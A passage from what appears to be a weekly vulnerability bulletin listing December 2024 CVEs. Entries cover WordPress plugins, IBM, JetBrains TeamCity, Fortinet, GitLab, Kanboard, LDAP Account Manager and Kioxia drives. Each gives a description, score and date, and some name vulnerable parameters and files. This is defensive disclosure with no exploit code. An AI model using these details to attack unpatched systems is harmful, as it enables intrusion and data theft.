via the 'btn_block_duplicate_post' function. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract potentially sensitive data from draft, scheduled (future), private, and password protected posts. 2024-12-19 4.3 CVE-2024-12560 brandtoss--WP Mailster Cross-Site Request Forgery (CSRF) vulnerability in brandtoss WP Mailster allows Cross Site Request Forgery.This issue affects WP Mailster: from n/a through 1.8.17.0. 2024-12-16 4.3 CVE-2024-54355 carlosfrancopkt1--PKT1 Centro de envios The PKT1 Centro de envios plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'success' and 'error' parameters in all versions up to, and including, 1.2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. 2024-12-20 6.1 CVE-2024-11806 chrisbadgett--LifterLMS WP LMS for eLearning, Online Courses, & Quizzes The LifterLMS - WP LMS for eLearning, Online Courses, & Quizzes plugin for WordPress is vulnerable to arbitrary post deletion due to a missing capability check on the 'llms_delete_cert' action in all versions up to, and including, 7.8.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary posts. 2024-12-18 4.3 CVE-2024-12596 Chunghwa Telecom--topm-client The topm-client from Chunghwa Telecom has an Arbitrary File Read vulnerability. The application sets up a simple local web server and provides APIs for communication with the target website. Due to the lack of CSRF protection for the APIs, unauthenticated remote attackers could use these APIs through phishing. Additionally, one of the APIs contains a Relative Path Traversal vulnerability, allowing attackers to read arbitrary files on the user's system. 2024-12-16 6.5 CVE-2024-12645 classcms -- classcms A vulnerability has been found in ClassCMS up to 4.8 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin?do=admin:user:editPost of the component User Management Page. The manipulation leads to improper handling of insufficient privileges. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. 2024-12-16 4.7 CVE-2024-12666 code-projects--Job Recruitment A vulnerability was found in code-projects Job Recruitment 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /_email.php. The manipulation of the argument email leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. 2024-12-21 4.3 CVE-2024-12883 code-projects--Online Exam Mastering System A vulnerability was found in code-projects Online Exam Mastering System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /update.php?q=quiz&step=2. The manipulation of the argument eid leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. 2024-12-22 6.3 CVE-2024-12890 code-projects--Online Exam Mastering System A vulnerability classified as critical has been found in code-projects Online Exam Mastering System 1.0. Affected is an unknown function of the file /account.php?q=quiz&step=2. The manipulation of the argument eid leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. 2024-12-22 6.3 CVE-2024-12891 codename065--Download Manager The Download Manager plugin for WordPress is vulnerable to unauthorized download of password-protected content due to improper password validation on the checkFilePassword function in all versions up to, and including, 3.3.03. This makes it possible for unauthenticated attackers to download password-protected files. 2024-12-19 5.3 CVE-2024-11768 codepeople--Calculated Fields Form The Calculated Fields Form plugin for WordPress is vulnerable to Denial of Service in all versions up to, and including, 5.2.63. This is due to unlimited height and width parameters for CAPTCHA images. This makes it possible for unauthenticated attackers to send multiple requests with large values, resulting in slowing server resources if the server does not mitigate Denial of Service attacks. 2024-12-17 5.3 CVE-2024-12601 Codezips--E-Commerce Site A vulnerability, which was classified as critical, was found in Codezips E-Commerce Site 1.0. This affects an unknown part of the file /admin/editorder.php. The manipulation of the argument dstatus/quantity/ddate leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. 2024-12-19 6.3 CVE-2024-12794 crmperks--CRM Perks WordPress HelpDesk Integration Zendesk, Freshdesk, HelpScout The CRM Perks - WordPress HelpDesk Integration - Zendesk, Freshdesk, HelpScout plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'crm-perks-tickets' shortcode in all versions up to, and including, 1.1.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 2024-12-16 6.4 CVE-2024-12443 cswaim--TPG Get Posts The TPG Get Posts plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'tpg_get_posts' shortcode in all versions up to, and including, 3.6.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 2024-12-17 6.4 CVE-2024-11906 cyberlord92--Broken Link Checker | Finder The Broken Link Checker | Finder plugin for WordPress is vulnerable to Blind Server-Side Request Forgery in all versions up to, and including, 2.5.0 via the 'moblc_check_link' function. This makes it possible for authenticated attackers, with Author-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. 2024-12-19 5.4 CVE-2024-12121 cyberlord92--Page Restriction WordPress (WP) Protect WP Pages/Post The Page Restriction WordPress (WP) - Protect WP Pages/Post plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.3.6 via the WordPress core search feature. This makes it possible for unauthenticated attackers to extract sensitive data from posts that have been restricted to higher-level roles such as administrator. 2024-12-20 5.3 CVE-2024-11297 Dave Kiss--Vimeography Generation of Error Message Containing Sensitive Information vulnerability in Dave Kiss Vimeography allows Retrieve Embedded Sensitive Data.This issue affects Vimeography: from n/a through 2.4.4. 2024-12-16 5.3 CVE-2024-54366 David Cramer--Caldera SMTP Mailer Missing Authorization vulnerability in David Cramer Caldera SMTP Mailer.This issue affects Caldera SMTP Mailer: from n/a through 1.0.1. 2024-12-16 4.3 CVE-2024-56003 Dell--AppSync Dell AppSync, version 4.6.0.x, contain a Symbolic Link (Symlink) Following vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to information tampering. 2024-12-17 4.4 CVE-2024-52542 Digital Operation Services--WiFiBurada Authentication Bypass by Assumed-Immutable Data vulnerability in Digital Operation Services WiFiBurada allows Manipulating User-Controlled Variables.This issue affects WiFiBurada: before 1.0.5. 2024-12-17 6.5 CVE-2024-8475 Digital Operation Services--WiFiBurada Improper Restriction of Excessive Authentication Attempts vulnerability in Digital Operation Services WiFiBurada allows Use of Known Domain Credentials.This issue affects WiFiBurada: before 1.0.5. 2024-12-17 4.3 CVE-2024-8429 discourse--discourse Discourse is an open source platform for community discussion. Users clicking on the lightbox thumbnails could be affected. This problem is patched in the latest version of Discourse. Users are advised to upgrade. There are no known workarounds for this vulnerability. 2024-12-19 6.8 CVE-2024-52794 discourse--discourse Discourse is an open source platform for community discussion. Sites that are using discourse connect but still have local logins enabled could allow attackers to bypass discourse connect to create accounts and login. This problem is patched in the latest version of Discourse. Users unable to upgrade who are using discourse connect may disable all other login methods as a workaround. 2024-12-19 5.3 CVE-2024-49765 Diversified Technology Corp., WPYog, and Gagan Deep Singh--DTC Documents Cross-Site Request Forgery (CSRF) vulnerability in Diversified Technology Corp., WPYog, and Gagan Deep Singh DTC Documents allows Cross Site Request Forgery.This issue affects DTC Documents: from n/a through 1.1.05. 2024-12-16 5.4 CVE-2024-54418 Dreamfox--Dreamfox Media Payment gateway per Product for Woocommerce Missing Authorization vulnerability in Dreamfox Dreamfox Media Payment gateway per Product for Woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Dreamfox Media Payment gateway per Product for Woocommerce: from n/a through 3.5.6. 2024-12-16 6.1 CVE-2024-55996 dusthazard--Popup Surveys & Polls for WordPress (Mare.io) Missing Authorization vulnerability in dusthazard Popup Surveys & Polls for WordPress (Mare.io) allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Popup Surveys & Polls for WordPress (Mare.io): from n/a through 1.36. 2024-12-16 5.4 CVE-2024-55998 elemntor--Elementor Website Builder More Than Just a Page Builder The Elementor Website Builder - More than Just a Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Typography Settings in all versions up to, and including, 3.25.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 2024-12-21 6.4 CVE-2024-10453 eLightUp--Falcon WordPress Optimizations & Tweaks Missing Authorization vulnerability in eLightUp Falcon - WordPress Optimizations & Tweaks allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Falcon - WordPress Optimizations & Tweaks: from n/a through 2.8.3. 2024-12-16 4.3 CVE-2024-54384 envoyproxy--envoy Envoy is a cloud-native high-performance edge/middle/service proxy. When additional address are not ip addresses, then the Happy Eyeballs sorting algorithm will crash in data plane. This issue has been addressed in releases 1.32.2, 1.31.4, and 1.30.8. Users are advised to upgrade. Users unable to upgrade may disable Happy Eyeballs and/or change the IP configuration. 2024-12-18 4.5 CVE-2024-53269 fabulatech -- usb_over_network A vulnerability classified as problematic has been found in FabulaTech USB over Network 6.0.6.1. Affected is the function 0x22040C in the library ftusbbus2.sys of the component IOCT Handler. The manipulation leads to null pointer dereference. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. 2024-12-16 5.5 CVE-2024-12653 fabulatech -- usb_over_network A vulnerability classified as problematic was found in FabulaTech USB over Network 6.0.6.1. Affected by this vulnerability is the function 0x220408 in the library ftusbbus2.sys of the component IOCT Handler. The manipulation leads to null pointer dereference. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. 2024-12-16 5.5 CVE-2024-12654 fabulatech -- usb_over_network A vulnerability, which was classified as problematic, has been found in FabulaTech USB over Network 6.0.6.1. Affected by this issue is the function 0x220420 in the library ftusbbus2.sys of the component IOCT Handler. The manipulation leads to null pointer dereference. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. 2024-12-16 5.5 CVE-2024-12655 fabulatech -- usb_over_network A vulnerability, which was classified as problematic, was found in FabulaTech USB over Network 6.0.6.1. This affects the function 0x220448 in the library ftusbbus2.sys of the component IOCT Handler. The manipulation leads to null pointer dereference. The attack needs to be approached locally. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. 2024-12-16 5.5 CVE-2024-12656 fahadmahmood--WP Docs The WP Docs plugin for WordPress is vulnerable to time-based SQL Injection via the 'dir_id' parameter in all versions up to, and including, 2.2.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. The vulnerability was partially patched in version 2.2.0. 2024-12-21 6.5 CVE-2024-12635 feedify--Feedify Web Push Notifications The Feedify - Web Push Notifications plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'platform', 'phone', 'email', and 'store_url' parameters. in all versions up to, and including, 2.4.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. 2024-12-20 6.1 CVE-2024-11811 financecalculatorwp--Financial Calculator The Financial Calculator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'finance_calculator' shortcode in all versions up to, and including, 2.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 2024-12-20 6.4 CVE-2024-11783 Fortinet--FortiClientMac A Cleartext Storage of Sensitive Information vulnerability [CWE-312] in FortiClientWindows 7.4.0 through 7.4.1, 7.2.0 through 7.2.6, 7.0.0 through 7.0.13 and FortiClientLinux 7.4.0 through 7.4.2, 7.2.0 through 7.2.7, 7.0.0 through 7.0.13 may permit a local authenticated user to retrieve VPN password via memory dump, due to JavaScript's garbage collector 2024-12-18 5 CVE-2024-50570 Fortinet--FortiOS A heap-based buffer overflow vulnerability in the processing of Link Control Protocol messages in FortiGate versions 5.6.12, 6.0.10, 6.2.4 and 6.4.1 and earlier may allow a remote attacker with valid SSL VPN credentials to crash the SSL VPN daemon by sending a large LCP packet, when tunnel mode is enabled. Arbitrary code execution may be theoretically possible, albeit practically very difficult to achieve in this context 2024-12-19 5.4 CVE-2020-12819 Fortinet--FortiOS Under non-default configuration, a stack-based buffer overflow in FortiOS version 6.0.10 and below, version 5.6.12 and below may allow a remote attacker authenticated to the SSL VPN to crash the FortiClient NAC daemon (fcnacd) and potentially execute arbitrary code via requesting a large FortiClient file name. We are not aware of proof of concept code successfully achieving the latter. 2024-12-19 5.4 CVE-2020-12820 freeben--Animated Counters The Animated Counters plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'animatedcounte' shortcode in all versions up to, and including, 2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 2024-12-17 6.4 CVE-2024-11905 gbsdeveloper--Category Post Slider The Category Post Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'category-post-slider' shortcode in all versions up to, and including, 1.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 2024-12-20 6.4 CVE-2024-11878 geoserver--geoserver GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. In affected versions the welcome and about page includes version and revision information about the software in use (including library and components used). This information is sensitive from a security point of view because it allows software used by the server to be easily identified. This issue has been patched in version 2.26.0 and all users are advised to upgrade. There are no known workarounds for this vulnerability. 2024-12-16 5.3 CVE-2024-35230 GitLab--GitLab An issue has been discovered in GitLab CE/EE affecting all versions from 16.9 before 17.4.6, 17.5 before 17.5.4, and 17.6 before 17.6.2. By using a specific GraphQL query, under specific conditions an unauthorized user can retrieve branch names. 2024-12-16 5.3 CVE-2024-8116 GitLab--GitLab An issue was discovered in GitLab CE/EE affecting all versions from 15.0 prior to 17.4.6, 17.5 prior to 17.5.4, and 17.6 prior to 17.6.2 that allowed non-member users to view unresolved threads marked as internal notes in public projects merge requests. 2024-12-16 5.3 CVE-2024-8650 HashiCorp--Nomad Nomad Community and Nomad Enterprise ("Nomad") allocations are vulnerable to privilege escalation within a namespace through unredacted workload identity tokens. This vulnerability, identified as CVE-2024-12678, is fixed in Nomad Community Edition 1.9.4 and Nomad Enterprise 1.9.4, 1.8.8, and 1.7.16. 2024-12-20 6.5 CVE-2024-12678 Hewlett Packard Enterprise (HPE)--HPE Alletra Storage MP B10000 Remote authentication bypass vulnerability in HPE Alletra Storage MP B10000 in versions prior to version 10.4.5 could be remotely exploited to allow disclosure of information. 2024-12-19 4 CVE-2024-54009 holithemes--WP SHAPES The WP SHAPES plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. 2024-12-20 6.4 CVE-2024-9619 HP--HP Linux Imaging and Printing Software The HP Linux Imaging and Printing (HPLIP) software may potentially be affected by memory buffer overflow. 2024-12-19 5.7 CVE-2020-6923 IBM--Cognos Analytics IBM Cognos AnalyticsÂ 11.2.0 through 11.2.4 and 12.0.0 through 12.0.3 could allow a remote attacker to conduct phishing attacks, using an open redirect attack. By persuading a victim to visit a specially crafted Web site, a remote attacker could exploit this vulnerability to spoof the URL displayed to redirect a user to a malicious Web site that would appear to be trusted. 2024-12-18 6.8 CVE-2024-45082 IBM--Cognos Analytics IBM Cognos AnalyticsÂ 11.2.0 through 11.2.4 and 12.0.0 through 12.0.3 is potentially vulnerable to Cross Site Scripting (XSS). A remote attacker could execute malicious commands due to improper validation of column headings in Cognos Explorations. 2024-12-18 5.4 CVE-2024-25042 IBM--Cognos Analytics IBM Cognos AnalyticsÂ 11.2.0 through 11.2.4 and 12.0.0 through 12.0.3 is vulnerable to HTML injection. A remote attacker could inject malicious HTML code, which when viewed, would be executed in the victim's Web browser within the security context of the hosting site. 2024-12-18 5.4 CVE-2024-41752 IBM--Cognos Analytics Mobile for Android IBM Cognos Analytics Mobile for Android 1.1.14 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. 2024-12-19 5.9 CVE-2021-39081 IBM--Db2 for Linux, UNIX and Windows IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 10.5, 11.1, and 11.5 is vulnerable to denial of service with a specially crafted query. 2024-12-19 5.3 CVE-2023-30443 IBM--i IBM i 7.4 and 7.5 is vulnerable to an authenticated user gaining elevated privilege to a physical file. A user with authority to a view can alter the based-on physical file security attributes without having object management rights to the physical file. A malicious actor can use the elevated privileges to perform actions restricted by their view privileges. 2024-12-18 6.8 CVE-2024-47104 IBM--i IBM i 7.3, 7.4, and 7.5 is vulnerable to server-side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks. 2024-12-21 5.4 CVE-2024-51463 IBM--i IBM i 7.3, 7.4, and 7.5 is vulnerable to bypassing Navigator for i interface restrictions. By sending a specially crafted request, an authenticated attacker could exploit this vulnerability to remotely perform operations that the user is not allowed to perform when using Navigator for i. 2024-12-21 4.3 CVE-2024-51464 IBM--InfoSphere Information Server IBM InfoSphere Information Server 11.7 could allow a remote attacker to hijack the clicking action of the victim. By persuading a victim to visit a malicious Web site, a remote attacker could exploit this vulnerability to hijack the victim's click actions and possibly launch further attacks against the victim. 2024-12-19 5.2 CVE-2021-29827 IBM--MQ IBM MQÂ 9.1 LTS, 9.2 LTS, 9.3 LTS, 9.3 CD, 9.4 LTS, 9.4 CD, IBM MQ ApplianceÂ 9.3 LTS, 9.3 CD, 9.4 LTS, and IBM MQ for HPE NonStop 8.1.0 through 8.1.0.25Â could allow an authenticated user to cause a denial-of-service due to messages with improperly set values. 2024-12-18 6.5 CVE-2024-51470 IBM--MQ Appliance IBM MQ Appliance 9.3 LTS, 9.3 CD, 9.4 LTS, and 9.4 CD web console could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned. 2024-12-19 6.2 CVE-2024-52896 IBM--MQ Appliance IBM MQ Appliance 9.3 LTS, 9.3 CD, and 9.4 LTSÂ web console could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned. 2024-12-19 6.2 CVE-2024-52897 IBM--MQ Appliance IBM MQ Appliance 9.3 LTS, 9.3 CD, and 9.4 LTSÂ web console could allow an authenticated user to cause a denial-of-service when trace is enabled due to information being written into memory outside of the intended buffer size. 2024-12-19 5.3 CVE-2024-51471 IBM--Robotic Process Automation IBM Robotic Process Automation 21.0.1, 21.0.2, and 21.0.3 could allow a user with psychical access to the system to obtain sensitive information due to insufficiently protected credentials. 2024-12-19 4.6 CVE-2022-33954 IBM--Security Directory Integrator IBM Security Directory Integrator 7.2.0 through 7.2.0.13 and 10.0.0 through 10.0.3 could allow a remote authenticated attacker to execute arbitrary commands on the system by sending a specially crafted request. 2024-12-20 6.8 CVE-2024-28767 IBM--Security Guardium IBM Security Guardium 11.5 is vulnerable to server-side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks. 2024-12-19 6.5 CVE-2024-49336 IBM--Security Guardium Key Lifecycle Manager IBM Security Guardium Key Lifecycle Manager 4.1, 4.1.1, 4.2.0, and 4.2.1Â stores potentially sensitive information in log files that could be read by a local privileged user. 2024-12-17 4.9 CVE-2024-49816 IBM--Security Guardium Key Lifecycle Manager IBM Security Guardium Key Lifecycle Manager 4.1, 4.1.1, 4.2.0, and 4.2.1 stores user credentials in configuration files which can be read by a local privileged user. 2024-12-17 4.4 CVE-2024-49817 IBM--Security Guardium Key Lifecycle Manager IBM Security Guardium Key Lifecycle Manager 4.1, 4.1.1, 4.2.0, and 4.2.1 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. 2024-12-17 4.3 CVE-2024-49818 IBM--Security Guardium Key Lifecycle Manager IBM Security Guardium Key Lifecycle Manager 4.1, 4.1.1, 4.2.0, and 4.2.1Â could allow a remote attacker to obtain sensitive information in cleartext in a communication channel that can be sniffed by unauthorized actors. 2024-12-17 4.1 CVE-2024-49819 IBM--Sterling B2B Integrator IBM Sterling B2B Integrator Standard Edition 5.2.0.0 through 6.1.1.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. 2024-12-19 5.4 CVE-2021-20553 IBM--Storage Defender - Resiliency Service IBM Storage Defender - Resiliency Service 2.0.0 through 2.0.9 does not properly validate a certificate which could allow an attacker to spoof a trusted entity by interfering in the communication path between the host and client. 2024-12-18 5.9 CVE-2024-47119 IBM--Storage Defender - Resiliency Service IBM Storage Defender - Resiliency Service 2.0.0 through 2.0.9 Â stores user credentials in plain text which can be read by an authenticated user with access to the pod. 2024-12-18 5.7 CVE-2024-52361 IBM--Storage Defender - Resiliency Service IBM Storage Defender - Resiliency Service 2.0.0 through 2.0.9 could allow a privileged user to obtain highly sensitive user credentials from secret keys that are stored in clear text. 2024-12-18 4.4 CVE-2023-50956 ideaboxcreations--PowerPack Lite for Beaver Builder The PowerPack Lite for Beaver Builder plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the navigate parameter in all versions up to, and including, 1.3.0.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick an administrative user into performing an action such as clicking on a link. 2024-12-17 6.1 CVE-2024-12239 Ilja Zaglov | IMBAA GmbH--Responsive Google Maps | by imbaa Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ilja Zaglov | IMBAA GmbH Responsive Google Maps | by imbaa allows Stored XSS.This issue affects Responsive Google Maps | by imbaa: from n/a through 1.2.5. 2024-12-16 6.5 CVE-2024-56011 Intelbras--VIP S3020 G2 A vulnerability was found in Intelbras VIP S3020 G2, VIP S4020 G2, VIP S4020 G3 and VIP S4320 G2 up to 20241222 and classified as problematic. Affected by this issue is some unknown functionality of the file /web_caps/webCapsConfig of the component Web Interface. The manipulation leads to information disclosure. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The vendor assesses that "the information disclosed in the URL is not sensitive or poses any risk to the user". 2024-12-22 5.3 CVE-2024-12896 iobit -- advanced_systemcare_ultimate A vulnerability has been found in IObit Advanced SystemCare Utimate up to 17.0.0 and classified as problematic. This vulnerability affects the function 0x8001E000 in the library AscRegistryFilter.sys of the component IOCTL Handler. The manipulation leads to null pointer dereference. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. 2024-12-16 5.5 CVE-2024-12657 iobit -- advanced_systemcare_ultimate A vulnerability was found in IObit Advanced SystemCare Utimate up to 17.0.0 and classified as problematic. This issue affects the function 0x8001E01C in the library AscRegistryFilter.sys of the component IOCTL Handler. The manipulation leads to null pointer dereference. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. 2024-12-16 5.5 CVE-2024-12658 iobit -- advanced_systemcare_ultimate A vulnerability was found in IObit Advanced SystemCare Utimate up to 17.0.0. It has been classified as problematic. Affected is the function 0x8001E004 in the library AscRegistryFilter.sys of the component IOCTL Handler. The manipulation leads to null pointer dereference. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. 2024-12-16 5.5 CVE-2024-12659 iobit -- advanced_systemcare_ultimate A vulnerability was found in IObit Advanced SystemCare Utimate up to 17.0.0. It has been declared as problematic. Affected by this vulnerability is the function 0x8001E018 in the library AscRegistryFilter.sys of the component IOCTL Handler. The manipulation leads to null pointer dereference. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. 2024-12-16 5.5 CVE-2024-12660 iobit -- advanced_systemcare_ultimate A vulnerability classified as problematic has been found in IObit Advanced SystemCare Utimate up to 17.0.0. This affects the function 0x8001E040 in the library AscRegistryFilter.sys of the component IOCTL Handler. The manipulation leads to null pointer dereference. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. 2024-12-16 5.5 CVE-2024-12662 IObit--Advanced SystemCare Utimate A vulnerability was found in IObit Advanced SystemCare Utimate up to 17.0.0. It has been rated as problematic. Affected by this issue is the function 0x8001E024 in the library AscRegistryFilter.sys of the component IOCTL Handler. The manipulation leads to null pointer dereference. The attack needs to be approached locally. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. 2024-12-16 5.5 CVE-2024-12661 iovamihai--Affiliate Program Suite SliceWP Affiliates The Affiliate Program Suite - SliceWP Affiliates plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.23. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. 2024-12-18 6.1 CVE-2024-12454 itsourcecode--Vehicle Management System A vulnerability was found in itsourcecode Vehicle Management System 1.0. It has been classified as critical. Affected is an unknown function of the file editbill.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. 2024-12-19 6.3 CVE-2024-12784 itsourcecode--Vehicle Management System A vulnerability was found in itsourcecode Vehicle Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file sendmail.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. 2024-12-19 6.3 CVE-2024-12785 Jake H.--Youtube Video Grid Cross-Site Request Forgery (CSRF) vulnerability in Jake H. Youtube Video Grid allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Youtube Video Grid: from n/a through 1.9. 2024-12-16 6.5 CVE-2024-54408 JetBrains--TeamCity In JetBrains TeamCity before 2024.12 access tokens were not revoked after removing user roles 2024-12-20 6.3 CVE-2024-56351 JetBrains--TeamCity In JetBrains TeamCity before 2024.12 improper access control allowed unauthorized users to modify build logs 2024-12-20 5.3 CVE-2024-56349 JetBrains--TeamCity In JetBrains TeamCity before 2024.12 backup file exposed user credentials and session cookies 2024-12-20 5.5 CVE-2024-56353 JetBrains--TeamCity In JetBrains TeamCity before 2024.12 password field value were accessible to users with view settings permission 2024-12-20 5.5 CVE-2024-56354 JetBrains--TeamCity In JetBrains TeamCity before 2024.12 insecure XMLParser configuration could lead to potential XXE attack 2024-12-20 5.9 CVE-2024-56356 JetBrains--TeamCity In JetBrains TeamCity before 2024.12 improper access control allowed viewing details of unauthorized agents 2024-12-20 4.3 CVE-2024-56348 JetBrains--TeamCity In JetBrains TeamCity before 2024.12 build credentials allowed unauthorized viewing of projects 2024-12-20 4.3 CVE-2024-56350 JetBrains--TeamCity In JetBrains TeamCity before 2024.12 stored XSS was possible via image name on the agent details page 2024-12-20 4.6 CVE-2024-56352 JetBrains--TeamCity In JetBrains TeamCity before 2024.12 missing Content-Type header in RemoteBuildLogController response could lead to XSS 2024-12-20 4.6 CVE-2024-56355 Jozoor--Arabic Webfonts Missing Authorization vulnerability in Jozoor Arabic Webfonts allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Arabic Webfonts: from n/a through 1.4.6. 2024-12-16 4.3 CVE-2024-54402 kanboard--kanboard Kanboard is project management software that focuses on the Kanban methodology. In affected versions sessions are still usable even though their lifetime has exceeded. Kanboard implements a cutom session handler (`app/Core/Session/SessionHandler.php`), to store the session data in a database. Therefore, when a `session_id` is given, kanboard queries the data from the `sessions` sql table. At this point, it does not correctly verify, if a given `session_id` has already exceeded its lifetime (`expires_at`). Thus, a session which's lifetime is already `> time()`, is still queried from the database and hence a valid login. The implemented **SessionHandlerInterface::gc** function, that does remove invalid sessions, is called only **with a certain probability** (_Cleans up expired sessions. Called by `session_start()`, based on `session.gc_divisor`, `session.gc_probability` and `session.gc_maxlifetime` settings_) accordingly to the php documentation. In the official Kanboard docker image these values default to: session.gc_probability=1, session.gc_divisor=1000. Thus, an expired session is only terminated with probability 1/1000. This issue has been addressed in release 1.2.43 and all users are advised to upgrade. There are no known workarounds for this vulnerability.
2024-12-19
6.5
CVE-2024-55603

Kioxia–CM6
There exists an unauthenticated accessible JTAG port on the Kioxia PM6, PM7 and CM6 devices -Â On the Kioxia CM6, PM6 and PM7 disk drives it was discovered that the 2 main CPU cores of the SoC can be accessed via an open JTAG debug port that is exposed on the drive’s circuit board. Due to the wide cutout of the enclosures, the JTAG port can be accessed without having to open the disk enclosure. Utilizing the JTAG debug port, an attacker with (temporary) physical access can get full access to the firmware and memory on the 2 main CPU cores within the drive including the execution of arbitrary code, the modification of firmware execution flow and data or bypassing the firmware signature verification during boot-up.
2024-12-20
6.8
CVE-2024-7726

Ksher–Ksher
Missing Authorization vulnerability in Ksher Ksher allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Ksher: from n/a through 1.1.1.
2024-12-16
6.5
CVE-2024-56001

LDAPAccountManager–lam
LDAP Account Manager (LAM) is a php webfrontend for managing entries (e.g. users, groups, DHCP settings) stored in an LDAP directory. In affected versions LAM does not properly sanitize configuration values, that are set via `mainmanage.php` and `confmain.php`. This allows setting arbitrary config values and thus effectively bypassing `mitigation` of CVE-2024-23333/GHSA-fm9w-7m7v-wxqv. Configuration values for the main config or server profiles are set via `mainmanage.php` and `confmain.php`. The values are written to `config.cfg` or `serverprofile.conf` in the format of `settingsName: settingsValue` line-by-line. An attacker can smuggle arbitrary config values in a config file, by inserting a newline into certain config fields, followed by the value. This vulnerability has been addressed in version 9.0. All users are advised to upgrade. There are no known workarounds for this vulnerability.
2024-12-17
6.5
CVE-2024-52792

Liferay–Portal
